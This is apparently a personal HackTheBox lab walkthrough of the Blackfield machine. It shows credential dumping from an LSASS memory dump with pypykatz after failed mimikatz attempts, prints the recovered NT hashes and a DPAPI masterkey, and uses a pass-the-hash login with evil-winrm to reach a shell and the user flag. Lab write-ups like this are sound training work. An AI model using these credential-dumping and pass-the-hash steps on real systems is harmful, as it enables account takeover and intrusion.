dllhost.zip A 18366396 Thu May 28 16:26:04 2020
ismserv.zip A 8810157 Thu May 28 16:26:13 2020
lsass.zip A 41936098 Thu May 28 16:25:08 2020
mmc.zip A 64288607 Thu May 28 16:25:25 2020
RuntimeBroker.zip A 13332174 Thu May 28 16:26:24 2020
ServerManager.zip A 131983313 Thu May 28 16:26:49 2020
sihost.zip A 33141744 Thu May 28 16:27:00 2020
smartscreen.zip A 33756344 Thu May 28 16:27:11 2020
svchost.zip A 14408833 Thu May 28 16:27:19 2020
taskhostw.zip A 34631412 Thu May 28 16:27:30 2020
winlogon.zip A 14255089 Thu May 28 16:27:38 2020
wlms.zip A 4067425 Thu May 28 16:27:44 2020
WmiPrvSE.zip A 18303252 Thu May 28 16:27:53 2020
5102079 blocks of size 4096. 1678438 blocks available
smb: \memory_analysis\>
i output this to chatGPT and asked it “anything interesting you see here:” and it told me
lsass.zip: This stands out immediately. LSASS (Local Security Authority Subsystem Service) manages the system’s authentication policy and might contain authentication credentials in memory. Attackers frequently target this process to extract clear-text passwords, hashes, Kerberos tickets, etc. Tools like Mimikatz can parse LSASS memory dumps for credentials.
┌──(kali㉿kali)-[~/HTB/blackfield]
└─$ cd lsass
cd: no such file or directory: lsass
┌──(kali㉿kali)-[~/HTB/blackfield]
└─$ ls
20230910090640_computers.json blackfield cleaned_users.txt domain_users.txt users2.txt
20230910090640_domains.json blackfield.gnmap cleanusers2.txt kerbrute users.txt
20230910090640_groups.json blackfield.nmap domain_admins.txt lsass.DMP
20230910090640_users.json blackfield.xml domain_groups.txt lsass.zip
┌──(kali㉿kali)-[~/HTB/blackfield]
└─$ cd lsass.DMP
cd: not a directory: lsass.DMP
┌──(kali㉿kali)-[~/HTB/blackfield]
└─$
Google how to work on this lsass.dmp
following this article
get mimikatz.py and cp to blackfield folder
nt.com)... 185.199.111.133, 185.199.109.133, 185.199.110.133, ...
Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|185.199.111.133|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 23657 (23K) [text/plain]
Saving to: ‘mimikatz.py’
mimikatz.py 100%[==============================================>] 23.10K --.-KB/s in 0.002s
2023-09-10 10:10:12 (10.7 MB/s) - ‘mimikatz.py’ saved [23657/23657]
┌──(kali㉿kali)-[~/Downloads]
└─$ ls
10.10.10.175:80 BloodHound-linux-x64.zip 'mimikatz(1).exe' System.ValueTuple.dll
10.10.10_files code_1.81.1-1691620686_amd64.deb mimikatz.exe Win32
aclpwn.py Invoke-Mimikatz.ps1 mimikatz.py winPEASx64.exe
Bloodhound_3 kerbrute_linux_amd64 mimikatz_trunk winPEASx86.exe
BloodHound-3.0.5.zip kiwi_passwords.yar mimikatz_trunk.zip x64
'BloodHound-linux-x64(1).zip' mimicom.idl README.md
┌──(kali㉿kali)-[~/Downloads]
└─$ cp mimikatz.py ~/HTB/blackfield
┌──(kali㉿kali)-[~/Downloads]
└─$
modified the mimikat.py so it can run with python3. recommendation by chatGPT after i got the error
┌──(kali㉿kali)-[~/HTB/blackfield]
└─$ 2to3 -w mimikatz.py
/usr/bin/2to3:3: DeprecationWarning: lib2to3 package is deprecated and may not be able to parse Python 3.10+
from lib2to3.main import main
RefactoringTool: Skipping optional fixer: buffer
RefactoringTool: Skipping optional fixer: idioms
RefactoringTool: Skipping optional fixer: set_literal
RefactoringTool: Skipping optional fixer: ws_comma
RefactoringTool: Refactored mimikatz.py
--- mimikatz.py (original)
+++ mimikatz.py (refactored)
@@ -296,12 +296,12 @@
return cleartext
def dump(self):
- print 'Dumping LSA Decryptor'
- print ' IV ({}): {}'.format(len(self.iv), self.iv.encode('hex'))
- print 'DES_KEY ({}): {}'.format(
- len(self.des_key), self.des_key.encode('hex'))
- print 'AES_KEY ({}): {}'.format(
- len(self.aes_key), self.aes_key.encode('hex'))
+ print('Dumping LSA Decryptor')
+ print(' IV ({}): {}'.format(len(self.iv), self.iv.encode('hex')))
+ print('DES_KEY ({}): {}'.format(
+ len(self.des_key), self.des_key.encode('hex')))
+ print('AES_KEY ({}): {}'.format(
+ len(self.aes_key), self.aes_key.encode('hex')))
class LsaDecryptor_x86(LsaDecryptor, Mimikatz_x86):
RefactoringTool: Files that were modified:
RefactoringTool: mimikatz.py
┌──(kali㉿kali)-[~/HTB/blackfield]
└─$
had to install missing dependency “construct”
└─$ python3 mimikatz.py
Traceback (most recent call last):
File "/home/kali/HTB/blackfield/mimikatz.py", line 31, in <module>
import construct
ModuleNotFoundError: No module named 'construct'
┌──(kali㉿kali)-[~/HTB/blackfield]
└─$ pip3 install construct
Defaulting to user installation because normal site-packages is not writeable
Collecting construct
Downloading construct-2.10.68.tar.gz (57 kB)
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 57.9/57.9 kB 743.5 kB/s eta 0:00:00
Preparing metadata (setup.py) ... done
Building wheels for collected packages: construct
Building wheel for construct (setup.py) ... done
Created wheel for construct: filename=construct-2.10.68-py3-none-any.whl size=59223 sha256=179a525c80f0ba0da8cea12f3129cb9dd0057e596e5043292f28804f35adecbc
Stored in directory: /home/kali/.cache/pip/wheels/6a/5b/a1/35e70b419451f0f619898c0f9ec10f3d920721daed7bc24eab
Successfully built construct
Installing collected packages: construct
Successfully installed construct-2.10.68
had to install volatility again a missing dependency
┌──(kali㉿kali)-[~/HTB/blackfield]
└─$ python3 mimikatz.py
Traceback (most recent call last):
File "/home/kali/HTB/blackfield/mimikatz.py", line 35, in <module>
import volatility.obj as obj
ModuleNotFoundError: No module named 'volatility'
┌──(kali㉿kali)-[~/HTB/blackfield]
└─$ pip3 install volatility3
Defaulting to user installation because normal site-packages is not writeable
Collecting volatility3
Downloading volatility3-2.4.1-py3-none-any.whl (687 kB)
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 687.5/687.5 kB 3.0 MB/s eta 0:00:00
Requirement already satisfied: pefile>=2017.8.1 in /usr/lib/python3/dist-packages (from volatility3) (2023.2.7)
Installing collected packages: volatility3
WARNING: The scripts vol and volshell are installed in '/home/kali/.local/bin' which is not on PATH.
Consider adding this directory to PATH or, if you prefer to suppress this warning, use --no-warn-script-location.
Successfully installed volatility3-2.4.1
┌──(kali㉿kali)-[~/HTB/blackfield]
└─$
many issues only to realise we have mimikatz.py under impacket
┌──(kali㉿kali)-[~/HTB/blackfield]
└─$ locate mimikatz.py
/usr/share/doc/python3-impacket/examples/mimikatz.py
┌──(kali㉿kali)-[~/HTB/blackfield]
└─$
i try to run mimikatz.py
└─$ python3 /usr/share/doc/python3-impacket/examples/mimikatz.py
Impacket v0.11.0 - Copyright 2023 Fortra
usage: mimikatz.py [-h] [-file FILE] [-debug] [-hashes LMHASH:NTHASH] [-no-pass] [-k] [-aesKey hex key]
[-dc-ip ip address] [-target-ip ip address]
target
SMB client implementation.
positional arguments:
target [[domain/]username[:password]@]<targetName or address>
options:
-h, --help show this help message and exit
-file FILE input file with commands to execute in the mini shell
-debug Turn DEBUG output ON
authentication:
-hashes LMHASH:NTHASH
NTLM hashes, format is LMHASH:NTHASH
-no-pass don't ask for password (useful for -k)
-k Use Kerberos authentication. Grabs credentials from ccache file (KRB5CCNAME) based on
target parameters. If valid credentials cannot be found, it will use the ones specified in
the command line
-aesKey hex key AES key to use for Kerberos Authentication (128 or 256 bits)
connection:
-dc-ip ip address IP Address of the domain controller. If omitted it will use the domain part (FQDN)
specified in the target parameter
-target-ip ip address
IP Address of the target machine. If omitted it will use whatever was specified as target.
This is useful when target is the NetBIOS name and you cannot resolve it
i am going to run the mimikaz exe with wine instead
Have to install wine on my kali
┌──(kali㉿kali)-[~/HTB/blackfield]
└─$ sudo dpkg --add-architecture i386
sudo apt update
Get:1 http://packages.microsoft.com/repos/code stable InRelease [3,569 B]
Get:2 http://packages.microsoft.com/repos/code stable/main armhf Packages [79.5 kB]
Hit:4 http://deb.debian.org/debian oldstable InRelease
Get:5 http://packages.microsoft.com/repos/code stable/main arm64 Packages [79.2 kB]
Get:6 http://packages.microsoft.com/repos/code stable/main amd64 Packages [78.6 kB]
Hit:3 http://kali.download/kali kali-rolling InRelease
Hit:7 https://debian.neo4j.com stable InRelease
Get:8 http://deb.debian.org/debian oldstable/main i386 Packages [8,122 kB]
Get:9 http://kali.download/kali kali-rolling/main i386 Packages [19.1 MB]
Get:10 https://debian.neo4j.com stable/3.5 i386 Packages [10.2 kB]
Get:11 http://deb.debian.org/debian oldstable/main i386 Contents (deb) [10.2 MB]
Get:12 http://kali.download/kali kali-rolling/main i386 Contents (deb) [43.8 MB]
Get:13 http://deb.debian.org/debian oldstable/contrib i386 Packages [45.4 kB]
Get:14 http://deb.debian.org/debian oldstable/contrib i386 Contents (deb) [33.6 kB]
Get:15 http://deb.debian.org/debian oldstable/non-free i386 Packages [79.3 kB]
Get:16 http://deb.debian.org/debian oldstable/non-free i386 Contents (deb) [29.2 kB]
Get:17 http://kali.download/kali kali-rolling/non-free i386 Packages [176 kB]
Get:18 http://kali.download/kali kali-rolling/non-free i386 Contents (deb) [862 kB]
Get:19 http://kali.download/kali kali-rolling/contrib i386 Packages [99.9 kB]
Get:20 http://kali.download/kali kali-rolling/contrib i386 Contents (deb) [138 kB]
Fetched 83.0 MB in 23s (3,545 kB/s)
Reading package lists... Done
Building dependency tree... Done
Reading state information... Done
13 packages can be upgraded. Run 'apt list --upgradable' to see them.
W: http://packages.microsoft.com/repos/code/dists/stable/InRelease: The key(s) in the keyring /etc/apt/trusted.gpg.d/neo4j-archive-keyring.gpg are ignored as the file has an unsupported filetype.
W: http://deb.debian.org/debian/dists/oldstable/InRelease: The key(s) in the keyring /etc/apt/trusted.gpg.d/neo4j-archive-keyring.gpg are ignored as the file has an unsupported filetype.
W: http://http.kali.org/kali/dists/kali-rolling/InRelease: The key(s) in the keyring /etc/apt/trusted.gpg.d/neo4j-archive-keyring.gpg are ignored as the file has an unsupported filetype.
W: https://debian.neo4j.com/dists/stable/InRelease: The key(s) in the keyring /etc/apt/trusted.gpg.d/neo4j-archive-keyring.gpg are ignored as the file has an unsupported filetype.
W: https://debian.neo4j.com/dists/stable/InRelease: Key is stored in legacy trusted.gpg keyring (/etc/apt/trusted.gpg), see the DEPRECATION section in apt-key(8) for details.
┌──(kali㉿kali)-[~/HTB/blackfield]
└─$ sudo apt install wine64
Reading package lists... Done
Building dependency tree... Done
Reading state information... Done
mimikazt fails me 🙁
mimikatz # sekurlsa::minidump lsass.DMP
Switch to MINIDUMP : 'lsass.DMP'
mimikatz # sekurlsa::logonpasswords
Opening : 'lsass.DMP' file for minidump...
ERROR kuhl_m_sekurlsa_acquireLSA ; Key import
mimikatz #
there is an implemention of mimikatz in python calledd pypykatz
installing it via pip
└─$ pip3 install pypykatz
Defaulting to user installation because normal site-packages is not writeable
DEPRECATION: Loading egg at /usr/local/lib/python3.11/dist-packages/volatility-2.6.1-py3.11.egg is deprecated. pip 23.3 will enforce this behaviour change. A possible replacement is to use pip for package installation..
Requirement already satisfied: pypykatz in /usr/lib/python3/dist-packages (0.6.6)
Requirement already satisfied: aesedb>=0.1.3 in /usr/lib/python3/dist-packages (from pypykatz) (0.1.3)
Requirement already satisfied: aiosmb>=0.4.4 in /usr/lib/python3/dist-packages (from pypykatz) (0.4.4)
Requirement already satisfied: aiowinreg>=0.0.7 in /usr/lib/python3/dist-packages (from pypykatz) (0.0.7)
Requirement already satisfied: minidump>=0.0.21 in /usr/lib/python3/dist-packages (from pypykatz) (0.0.21)
Requirement already satisfied: minikerberos>=0.4.0 in /usr/lib/python3/dist-packages (from pypykatz) (0.4.0)
Requirement already satisfied: msldap>=0.4.7 in /usr/lib/python3/dist-packages (from pypykatz) (0.4.7)
Requirement already satisfied: tqdm in /usr/lib/python3/dist-packages (from pypykatz) (4.64.1)
Requirement already satisfied: unicrypto>=0.0.10 in /usr/lib/python3/dist-packages (from pypykatz) (0.0.10)
Requirement already satisfied: winacl>=0.1.6 in /usr/lib/python3/dist-packages (from pypykatz) (0.1.7)
Requirement already satisfied: colorama in /usr/lib/python3/dist-packages (from aesedb>=0.1.3->pypykatz) (0.4.6)
Requirement already satisfied: asyauth>=0.0.8 in /usr/lib/python3/dist-packages (from aiosmb>=0.4.4->pypykatz) (0.0.9)
Requirement already satisfied: asysocks>=0.2.2 in /usr/lib/python3/dist-packages (from aiosmb>=0.4.4->pypykatz) (0.2.2)
Requirement already satisfied: asn1crypto>=1.3.0 in /usr/lib/python3/dist-packages (from minikerberos>=0.4.0->pypykatz) (1.5.1)
Requirement already satisfied: oscrypto>=1.2.1 in /usr/lib/python3/dist-packages (from minikerberos>=0.4.0->pypykatz) (1.3.0)
Requirement already satisfied: six in /usr/lib/python3/dist-packages (from minikerberos>=0.4.0->pypykatz) (1.16.0)
Requirement already satisfied: pycryptodomex in /usr/lib/python3/dist-packages (from unicrypto>=0.0.10->pypykatz) (3.11.0)
Requirement already satisfied: cryptography>=38.0.1 in /usr/lib/python3/dist-packages (from winacl>=0.1.6->pypykatz) (38.0.4)
i asked chatGPT for teh command and it gave me – -pypykatz lsa minidump lsass.DMP -o output.txt
┌──(kali㉿kali)-[~/HTB/blackfield]
└─$ pypykatz lsa minidump lsass.DMP -o output.txt
INFO:pypykatz:Parsing file lsass.DMP
┌──(kali㉿kali)-[~/HTB/blackfield]
└─$ ls
20230910090640_computers.json blackfield cleaned_users.txt domain_users.txt mimikatz.exe users2.txt
20230910090640_domains.json blackfield.gnmap cleanusers2.txt kerbrute mimikatz.py users.txt
20230910090640_groups.json blackfield.nmap domain_admins.txt lsass.DMP mimikatz.py.bak volatility
20230910090640_users.json blackfield.xml domain_groups.txt lsass.zip output.txt
┌──(kali㉿kali)-[~/HTB/blackfield]
└─$
we get hashes for administrator and for svc_backup
administrator
== LogonSession ==
authentication_id 153705 (25869)
session_id 1
username Administrator
domainname BLACKFIELD
logon_server DC01
logon_time 2020-02-23T17:59:04.506080+00:00
sid S-1-5-21-4194615774-2175524697-3563712290-500
luid 153705
== MSV ==
Username: Administrator
Domain: BLACKFIELD
LM: NA
NT: 7f1e4ff8c6a8e6b6fcae2d9c0572cd62
SHA1: db5c89a961644f0978b4b69a4d2a2239d7886368
DPAPI: 240339f898b6ac4ce3f34702e4a89550
== WDIGEST [25869]==
username Administrator
domainname BLACKFIELD
password None
password (hex)
== Kerberos ==
Username: Administrator
Domain: BLACKFIELD.LOCAL
== WDIGEST [25869]==
username Administrator
domainname BLACKFIELD
password None
password (hex)
== DPAPI [25869]==
luid 153705
key_guid d1f69692-cfdc-4a80-959e-bab79c9c327e
masterkey 769c45bf7ceb3c0e28fb78f2e355f7072873930b3c1d3aef0e04ecbb3eaf16aa946e553007259bf307eb740f222decadd996ed660ffe648b0440d84cd97bf5a5
sha1_masterkey d04452f8459a46460939ced67b971bcf27cb2fb9
svc_backup
FILE: ======== lsass.DMP =======
== LogonSession ==
authentication_id 406458 (633ba)
session_id 2
username svc_backup
domainname BLACKFIELD
logon_server DC01
logon_time 2020-02-23T18:00:03.423728+00:00
sid S-1-5-21-4194615774-2175524697-3563712290-1413
luid 406458
== MSV ==
Username: svc_backup
Domain: BLACKFIELD
LM: NA
NT: 9658d1d1dcd9250115e2205d9f48400d
SHA1: 463c13a9a31fc3252c68ba0a44f0221626a33e5c
DPAPI: a03cd8e9d30171f3cfe8caad92fef621
== WDIGEST [633ba]==
username svc_backup
domainname BLACKFIELD
password None
password (hex)
== Kerberos ==
Username: svc_backup
Domain: BLACKFIELD.LOCAL
== WDIGEST [633ba]==
username svc_backup
domainname BLACKFIELD
password None
password (hex)
using evil-wrm on both
administrator – no luck
┌──(kali㉿kali)-[~/Downloads/x64]
└─$ crackmapexec winrm 10.10.10.161 -u Administrator -H 7f1e4ff8c6a8e6b6fcae2d9c0572cd62
[*] completed: 100.00% (1/1)
┌──(kali㉿kali)-[~/Downloads/x64]
└─$ evil-winrm -i 10.10.10.192 -u Administrator -H 7f1e4ff8c6a8e6b6fcae2d9c0572cd62
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
Error: An error of type WinRM::WinRMAuthorizationError happened, message is WinRM::WinRMAuthorizationError
Error: Exiting with code 1
svc_backup – Phew we are in and get a flag
┌──(kali㉿kali)-[~/Downloads/x64]
└─$ evil-winrm -i 10.10.10.192 -u svc_backup -H 9658d1d1dcd9250115e2205d9f48400d
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\svc_backup\Documents> ls
*Evil-WinRM* PS C:\Users\svc_backup\Documents> cd ../
*Evil-WinRM* PS C:\Users\svc_backup> cd dektop
Cannot find path 'C:\Users\svc_backup\dektop' because it does not exist.
At line:1 char:1
+ cd dektop
+ ~~~~~~~~~
+ CategoryInfo : ObjectNotFound: (C:\Users\svc_backup\dektop:String) [Set-Location], ItemNotFoundException
+ FullyQualifiedErrorId : PathNotFound,Microsoft.PowerShell.Commands.SetLocationCommand
*Evil-WinRM* PS C:\Users\svc_backup> cd Desktop
*Evil-WinRM* PS C:\Users\svc_backup\Desktop> cat users.txt
Cannot find path 'C:\Users\svc_backup\Desktop\users.txt' because it does not exist.
At line:1 char:1
+ cat users.txt
+ ~~~~~~~~~~~~~
+ CategoryInfo : ObjectNotFound: (C:\Users\svc_backup\Desktop\users.txt:String) [Get-Content], ItemNotFoundException
+ FullyQualifiedErrorId : PathNotFound,Microsoft.PowerShell.Commands.GetContentCommand
*Evil-WinRM* PS C:\Users\svc_backup\Desktop> ls
Directory: C:\Users\svc_backup\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 2/28/2020 2:26 PM 32 user.txt
*Evil-WinRM* PS C:\Users\svc_backup\Desktop> cat user.txt
3920bb317a0bef51027e2852be64b543
Privilege escalation – To be continues